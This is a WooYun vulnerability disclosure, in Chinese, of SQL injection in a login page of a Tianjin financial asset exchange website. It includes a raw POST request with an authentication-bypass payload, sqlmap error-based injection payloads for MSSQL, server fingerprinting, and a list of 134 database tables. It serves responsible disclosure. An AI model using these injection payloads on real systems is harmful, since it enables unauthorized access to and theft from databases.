当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0150515

漏洞标题:天津金融资产交易所某站sql注入漏洞

相关厂商:天津金融资产交易所

漏洞作者: onpu

提交时间:2015-10-31 23:53

修复时间:2015-12-19 14:34

公开时间:2015-12-19 14:34

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-10-31: 细节已通知厂商并且等待厂商处理中
2015-11-04: 厂商已经确认,细节仅向厂商公开
2015-11-14: 细节向核心白帽子及相关领域专家公开
2015-11-24: 细节向普通白帽子公开
2015-12-04: 细节向实习白帽子公开
2015-12-19: 细节向公众公开

简要描述:

天津金融资产交易所某站sql注入漏洞

详细说明:

后台存在SQL漏洞,134张表,SA权限,可列出并破解数据库用户的hash
注入地址:

POST /Login.aspx HTTP/1.1
Host: **.**.**.**
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://**.**.**.**/Login.aspx
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 436
__LASTFOCUS=&__EVENTTARGET=txtUserName&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKLTQyOTYwODY3Nw9kFgICAQ9kFgQCAQ8PFgIeBFRleHQFASdkZAIHDw8WAh8ABR7nmbvlvZXlkI3miJblr4bnoIHkuI3mraPnoa7vvIFkZBgBBR5fX0NvbnRyb2xzUmVxdWlyZVBvc3RCYWNrS2V5X18WAQUJaWJ0bkxvZ0luDn2ZN3vSlWPQi3pJB31Lq75HA40%3D&txtUserName=%27or%27%3D%27or%27&txtPassWord=1&ibtnLogIn.x=33&ibtnLogIn.y=6&__EVENTVALIDATION=%2FwEWBALS0PSPBwKl1bKzCQK1qbSWCwKBo5TKDiRy4XUvJXGk8eyNBaooo9d8phlb

漏洞证明:

Parameter: txtUserName (POST)
    Type: error-based
    Title: Microsoft SQL Server/Sybase OR error-based - WHERE or HAVING clause
    Payload: __LASTFOCUS=&__EVENTTARGET=txtUserName&__EVENTARGUMENT=&__VIEWSTATE=/wEPDwUKLTQyOTYwODY3Nw9kFgICAQ9kFgQCAQ8PFgIeBFRleHQFhRBTeXN0ZW0uRGF0YS5TcWxDbGllbnQuU3FsRXhjZXB0aW9uOiDlnKjlhbPplK7lrZcgJ29yJyDpmYTov5HmnInor63ms5XplJnor6/jgIINCiAgIOWcqCBTeXN0ZW0uRGF0YS5TcWxDbGllbnQuU3FsQ29ubmVjdGlvbi5PbkVycm9yKFNxbEV4Y2VwdGlvbiBleGNlcHRpb24sIEJvb2xlYW4gYnJlYWtDb25uZWN0aW9uKQ0KICAg5ZyoIFN5c3RlbS5EYXRhLlNxbENsaWVudC5TcWxJbnRlcm5hbENvbm5lY3Rpb24uT25FcnJvcihTcWxFeGNlcHRpb24gZXhjZXB0aW9uLCBCb29sZWFuIGJyZWFrQ29ubmVjdGlvbikNCiAgIOWcqCBTeXN0ZW0uRGF0YS5TcWxDbGllbnQuVGRzUGFyc2VyLlRocm93RXhjZXB0aW9uQW5kV2FybmluZyhUZHNQYXJzZXJTdGF0ZU9iamVjdCBzdGF0ZU9iaikNCiAgIOWcqCBTeXN0ZW0uRGF0YS5TcWxDbGllbnQuVGRzUGFyc2VyLlJ1bihSdW5CZWhhdmlvciBydW5CZWhhdmlvciwgU3FsQ29tbWFuZCBjbWRIYW5kbGVyLCBTcWxEYXRhUmVhZGVyIGRhdGFTdHJlYW0sIEJ1bGtDb3B5U2ltcGxlUmVzdWx0U2V0IGJ1bGtDb3B5SGFuZGxlciwgVGRzUGFyc2VyU3RhdGVPYmplY3Qgc3RhdGVPYmopDQogICDlnKggU3lzdGVtLkRhdGEuU3FsQ2xpZW50LlNxbERhdGFSZWFkZXIuQ29uc3VtZU1ldGFEYXRhKCkNCiAgIOWcqCBTeXN0ZW0uRGF0YS5TcWxDbGllbnQuU3FsRGF0YVJlYWRlci5nZXRfTWV0YURhdGEoKQ0KICAg5ZyoIFN5c3RlbS5EYXRhLlNxbENsaWVudC5TcWxDb21tYW5kLkZpbmlzaEV4ZWN1dGVSZWFkZXIoU3FsRGF0YVJlYWRlciBkcywgUnVuQmVoYXZpb3IgcnVuQmVoYXZpb3IsIFN0cmluZyByZXNldE9wdGlvbnNTdHJpbmcpDQogICDlnKggU3lzdGVtLkRhdGEuU3FsQ2xpZW50LlNxbENvbW1hbmQuUnVuRXhlY3V0ZVJlYWRlclRkcyhDb21tYW5kQmVoYXZpb3IgY21kQmVoYXZpb3IsIFJ1bkJlaGF2aW9yIHJ1bkJlaGF2aW9yLCBCb29sZWFuIHJldHVyblN0cmVhbSwgQm9vbGVhbiBhc3luYykNCiAgIOWcqCBTeXN0ZW0uRGF0YS5TcWxDbGllbnQuU3FsQ29tbWFuZC5SdW5FeGVjdXRlUmVhZGVyKENvbW1hbmRCZWhhdmlvciBjbWRCZWhhdmlvciwgUnVuQmVoYXZpb3IgcnVuQmVoYXZpb3IsIEJvb2xlYW4gcmV0dXJuU3RyZWFtLCBTdHJpbmcgbWV0aG9kLCBEYkFzeW5jUmVzdWx0IHJlc3VsdCkNCiAgIOWcqCBTeXN0ZW0uRGF0YS5TcWxDbGllbnQuU3FsQ29tbWFuZC5SdW5FeGVjdXRlUmVhZGVyKENvbW1hbmRCZWhhdmlvciBjbWRCZWhhdmlvciwgUnVuQmVoYXZpb3IgcnVuQmVoYXZpb3IsIEJvb2xlYW4gcmV0dXJuU3RyZWFtLCBTdHJpbmcgbWV0aG9kKQ0KICAg5ZyoIFN5c3RlbS5EYXRhLlNxbENsaWVudC5TcWxDb21tYW5kLkV4ZWN1dGVSZWFkZXIoQ29tbWFuZEJlaGF2aW9yIGJlaGF2aW9yLCBTdHJpbmcgbWV0aG9kKQ0KICAg5ZyoIFN5c3RlbS5EYXRhLlNxbENsaWVudC5TcWxDb21tYW5kLkV4ZWN1dGVEYkRhdGFSZWFkZXIoQ29tbWFuZEJlaGF2aW9yIGJlaGF2aW9yKQ0KICAg5ZyoIFN5c3RlbS5EYXRhLkNvbW1vbi5EYkNvbW1hbmQuU3lzdGVtLkRhdGEuSURiQ29tbWFuZC5FeGVjdXRlUmVhZGVyKENvbW1hbmRCZWhhdmlvciBiZWhhdmlvcikNCiAgIOWcqCBTeXN0ZW0uRGF0YS5Db21tb24uRGJEYXRhQWRhcHRlci5GaWxsSW50ZXJuYWwoRGF0YVNldCBkYXRhc2V0LCBEYXRhVGFibGVbXSBkYXRhdGFibGVzLCBJbnQzMiBzdGFydFJlY29yZCwgSW50MzIgbWF4UmVjb3JkcywgU3RyaW5nIHNyY1RhYmxlLCBJRGJDb21tYW5kIGNvbW1hbmQsIENvbW1hbmRCZWhhdmlvciBiZWhhdmlvcikNCiAgIOWcqCBTeXN0ZW0uRGF0YS5Db21tb24uRGJEYXRhQWRhcHRlci5GaWxsKERhdGFTZXQgZGF0YVNldCwgSW50MzIgc3RhcnRSZWNvcmQsIEludDMyIG1heFJlY29yZHMsIFN0cmluZyBzcmNUYWJsZSwgSURiQ29tbWFuZCBjb21tYW5kLCBDb21tYW5kQmVoYXZpb3IgYmVoYXZpb3IpDQogICDlnKggU3lzdGVtLkRhdGEuQ29tbW9uLkRiRGF0YUFkYXB0ZXIuRmlsbChEYXRhU2V0IGRhdGFTZXQpDQogICDlnKggREFMLlVzZXJMb2dpbi5HZXRVc2VyTmFtZShTdHJpbmcgVXNlck5hbWUpZGQCBw8PFgIfAAUe55m75b2V5ZCN5oiW5a+G56CB5LiN5q2j56Gu77yBZGQYAQUeX19Db250cm9sc1JlcXVpcmVQb3N0QmFja0tleV9fFgEFCWlidG5Mb2dJbrxwE7sphNdEvH2/dpGa61pKXALf&txtUserName=-8832') OR 4454=CONVERT(INT,(SELECT CHAR(113)+CHAR(120)+CHAR(107)+CHAR(107)+CHAR(113)+(SELECT (CASE WHEN (4454=4454) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(120)+CHAR(107)+CHAR(107)+CHAR(113))) AND ('VYtM'='VYtM&txtPassWord=1&ibtnLogIn.x=33&ibtnLogIn.y=6&__EVENTVALIDATION=/wEWBAKtqufXDAKl1bKzCQK1qbSWCwKBo5TKDuoowWxv3lzjCrWavsEoT32Xg+0X
    Vector: OR [RANDNUM]=CONVERT(INT,(SELECT '[DELIMITER_START]'+([QUERY])+'[DELIMITER_STOP]'))
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2000
Database: nprtcm


134张表:

Database: nprtcm
[134 tables]
+----------------------------+
| A_HangCancel               |
| A_HangTimeRenew            |
| A_HangtimeLimit            |
| A_HangupAgain              |
| A_ModifyInformation        |
| A_PayeeChange              |
| A_ScarcityRegistApply      |
| CR_CalculateColumn         |
| CR_Column                  |
| CR_GroupbyCondition        |
| CR_JoinTableCondition      |
| CR_OrderbyCondition        |
| CR_Report                  |
| CR_UsedColumn              |
| CR_UsedView                |
| CR_View                    |
| CR_WhereCause              |
| C_AuctionChange            |
| C_HouseChange              |
| C_Investment               |
| C_PracticalityChange       |
| C_PropertyChange           |
| C_Purchase                 |
| C_StockChange              |
| C_TechnologyChange         |
| D_PracticalityTransfer     |
| D_PracticalityTransfer$    |
| D_PropertyTransfer         |
| D_StockPropertyTransfer    |
| D_TechnologyTransfer       |
| G_GranteeName              |
| G_ManageProperty           |
| G_PracticalityTransfer     |
| G_PropertyTransfer         |
| G_StockPropertyTransfer    |
| G_TechnologyTransfer       |
| M_Associator               |
| M_AssociatorAuditing       |
| PropertyItemDetail         |
| R_AgreementStatistic       |
| R_AppraiseStatistic        |
| R_HangGrantee              |
| R_HangStatistic            |
| ReportForBar               |
| S_AppraiseTitle            |
| S_Area                     |
| S_AssociatorKind           |
| S_Category                 |
| S_Certificate              |
| S_ClassKind                |
| S_CodeLength               |
| S_Country                  |
| S_Currency                 |
| S_Department               |
| S_District                 |
| S_DocumentDetail           |
| S_Documents                |
| S_EconomyKind              |
| S_FlowCourse               |
| S_FlowDetail               |
| S_GlebeKind                |
| S_Headship                 |
| S_Industry                 |
| S_Industry$                |
| S_ItemPhase                |
| S_Local                    |
| S_Log                      |
| S_Market                   |
| S_Message                  |
| S_Module                   |
| S_MonitorUser              |
| S_NetUser                  |
| S_NetUserKind              |
| S_NorthMarketUser          |
| S_NorthUserCode            |
| S_Popedom_Dep              |
| S_Popedom_User             |
| S_PrintDocument            |
| S_Prompt                   |
| S_PropertyKind             |
| S_PropertyTransferKind     |
| S_Table                    |
| S_TechnologyTransferKind   |
| S_Time                     |
| S_User                     |
| S_UserKind                 |
| S_Vocation                 |
| T_AppraiseAuditing         |
| T_BalanceInAudit           |
| T_BalanceOutAudit          |
| T_BalanceSheet             |
| T_CommissionProtocol       |
| T_DocumentsList            |
| T_MostlyConstruction       |
| T_MostlyEquipment          |
| T_PracticalityTransfer     |
| T_PropertyTransfer         |
| T_StockPropertyTransfer    |
| T_TechnologyTransfer       |
| T_TradeContract            |
| T_TradeUnit                |
| T_TransferRequest          |
| T_TransferWorthiness       |
| dtproperties               |
| syncobj_0x3032383843333645 |
| syncobj_0x3043303532324146 |
| syncobj_0x3135333030313945 |
| syncobj_0x3142413734303633 |
| syncobj_0x3232363239443035 |
| syncobj_0x3244343138333831 |
| syncobj_0x3245313837383944 |
| syncobj_0x3337373031383743 |
| syncobj_0x3434304131453641 |
| syncobj_0x3636453544393942 |
| syncobj_0x3638384242463443 |
| syncobj_0x3735424546303741 |
| syncobj_0x3741313135393430 |
| syncobj_0x3838343042463333 |
| syncobj_0x3845324235423544 |
| syncobj_0x3937344635443938 |
| syncobj_0x3939374136304631 |
| syncobj_0x3942333443323036 |
| syncobj_0x4135324146323133 |
| syncobj_0x4136443133463835 |
| syncobj_0x4232313330363446 |
| syncobj_0x4330324334464142 |
| syncobj_0x4330393745354236 |
| syncobj_0x4331394342383041 |
| syncobj_0x4436314534343635 |
| syncobj_0x4541324344384143 |
| syncobj_0x4544463641343335 |
| syncobj_0x4630333630313041 |
| sysconstraints             |
| syssegments                |
+----------------------------+


点到为止

修复方案:

过滤

版权声明:转载请注明来源 onpu@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2015-11-04 14:33

厂商回复:

CNVD确认并复现所述漏洞情况,已经转由CNCERT下发对应分中心,由其后续协调网站管理单位处置。

最新状态:

暂无